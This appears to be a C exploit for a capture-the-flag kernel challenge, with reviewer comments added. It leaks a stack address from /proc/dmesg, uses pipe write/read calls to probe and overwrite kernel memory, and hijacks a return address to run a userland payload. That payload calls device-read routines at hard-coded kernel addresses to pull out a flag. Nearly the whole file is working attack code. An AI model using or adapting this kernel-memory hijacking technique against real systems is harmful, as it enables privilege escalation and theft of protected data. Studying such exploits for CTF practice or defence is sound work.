#include <cstring> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <sys/cdefs.h> | |
#include <sys/mman.h> | |
#include <sys/uio.h> | |
#include <unistd.h> | |
// Reads /proc/dmesg line by line (the loop body is empty, so only the buffer
// left by the final getline() call is used afterwards — presumably the last
// line, TODO confirm what getline leaves in `line` at EOF), then takes the
// text two characters past the first "@" on that line up to the next space
// and parses it as hexadecimal.
//
// Returns: the parsed value with 0xC0000000 OR'd in. Per the author's note,
// the first three characters of the token are skipped before strtoul() and
// the high nibble is restored with the OR.
//
// Notes grounded in the code: the fopen() result is passed to getline()
// unchecked; both strstr() results are dereferenced without a NULL check;
// `line` (allocated by getline) is never freed.
unsigned long find_stackbase()
{
    FILE* fp;
    char* line = NULL;
    char* end = NULL;
    size_t len = 0;
    ssize_t read;
    unsigned long val = 0;
    fp = fopen("/proc/dmesg", "r");
    // Drain the file; `line` is reused by getline() on every iteration.
    while ((read = getline(&line, &len, fp)) != -1) {
    }
    // Skip to two characters after the first "@" and terminate at the next space.
    line = strstr(line, "@") + 2;
    end = strstr(line, " ");
    *end = 0;
    fclose(fp);
    //strtoul is broken so we chop off the highest nibble and add it back in after
    val = strtoul(line + 3, NULL, 16);
    val |= 0xC0000000;
    return val;
}
// Scans 0x10000 bytes starting at `stack_base`, one 0x1000-byte page at a
// time, for the 32-bit little-endian value 0x001470c7.
//
// For each page the function attempts write(p[1], page, 0x1000) into a pipe;
// only when that call does not return -1 is the page read back into `buf`
// and scanned at 4-byte steps.
//
// Returns: the address (stack_base + page offset + match offset) of the first
// match, or 0 if no page produced a match.
//
// Notes grounded in the code: the pipe() result and the read() result are
// not checked; the pipe descriptors are never closed; the scan loads through
// `*(uint32_t*)(buf + j)` rather than memcpy (j is a multiple of 4, so the
// access is aligned relative to `buf`, but it is still a type-punned read).
// The extra inner brace pair carries no additional scope meaning here.
unsigned long find_hijack(unsigned long stack_base)
{
    {
        int p[2];
        char buf[0x1000] = {};
        pipe(p);
        unsigned long addr = stack_base;
        for (int i = 0; i < 0x10000; i += 0x1000) {
            // A write() that does not fail means the page was accepted by the pipe.
            int err = write(p[1], (void*)(addr + i), 0x1000);
            if (err != -1) {
                err = read(p[0], buf, 0x1000);
                // Upper bound leaves room for a full 4-byte load at the last index.
                for (int j = 0; j < 0x1000 - 0x4; j += 4) {
                    uint32_t ret = *(uint32_t*)(buf + j);
                    if (ret == 0x001470c7) {
                        return addr + i + j;
                    }
                }
            }
        }
        return 0;
    }
}
// Body run by the forked child in main(): sleeps 5 seconds, prints a marker
// line, then terminates the process with exit(0).
//
// Declared to return unsigned long but never returns — exit() does not
// return, so no value is produced; the return type is effectively unused.
unsigned long sleep_child()
{
    sleep(5);
    printf("we made it here\n");
    exit(0);
}
// File-scope state.
// `muid` is not referenced anywhere in the visible code.
unsigned long muid;
// Page mapped with mmap() in main() (MAP_SHARED|MAP_ANON) and passed to
// device_read() from payload().
void* shared;
// Function pointers bound to fixed numeric addresses (0x118728 and 0x118a46).
// NOTE(review): these are presumably specific to one particular target image
// and are not resolved or validated anywhere in this file — confirm against
// the intended target before relying on them.
void* (*get_device)(int, int) = (void* (*)(int, int))(0x118728);
void* (*device_read)(void*, unsigned int, unsigned int, void*) = (void* (*)(void*, unsigned int, unsigned int, void*))(0x118a46);
// Calls get_device(3, 1), then device_read(dev, 0, 512, shared) so that up to
// 512 bytes land in the `shared` mapping, and finally stores 0x31313131
// through the constant address 0x41414141.
//
// NOTE(review): the final store is to a fixed, almost certainly unmapped
// address — presumably a deliberate fault used as a stop marker; confirm.
// The return value of get_device() is passed on without a NULL check.
void payload()
{
    void* dev = get_device(3, 1);
    device_read(dev, 0, 512, shared);
    *(unsigned long*)0x41414141 = 0x31313131;
}
// Program entry point (arguments unused).
//
// Sequence as written:
//  1. map one shared anonymous page into `shared`;
//  2. fork; the child runs sleep_child() (which exits), the parent continues;
//  3. after a 1 s pause, compute stackbase via find_stackbase() and hijack via
//     find_hijack(stackbase), printing both;
//  4. write 4 bytes of `val` (the address of payload) into a fresh pipe and
//     read those 4 bytes back to the address `hijack`;
//  5. after 5 s, print the contents of `shared` as a C string; after another
//     10 s, return 1.
//
// Notes grounded in the code: mmap(), fork() and pipe() results are not
// checked; only 4 of sizeof(unsigned long) bytes of `val` are transferred, so
// on a 64-bit build the upper half of the address is dropped; `err` is an
// int printed with %x, and both pipe descriptors are never closed.
// `shared` is printed with %s, so it is only read up to its first NUL byte.
int main(int, char**)
{
    shared = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, -1, 0);
    if (fork() == 0) {
        sleep_child();
    }
    sleep(1);
    unsigned long stackbase = find_stackbase();
    printf("stackbase at %lx\n", stackbase);
    unsigned long hijack = find_hijack(stackbase);
    printf("hijack at %lx\n", hijack);
    int p[2];
    pipe(p);
    unsigned long val = (unsigned long)&payload;
    // Only the low 4 bytes of `val` pass through the pipe.
    int err = write(p[1], &val, 4);
    printf("err is %x\n", err);
    err = read(p[0], (void*)hijack, 4);
    printf("err is %x\n", err);
    sleep(5);
    printf("flag is %s\n", (char*)shared);
    sleep(10);
    return 1;
}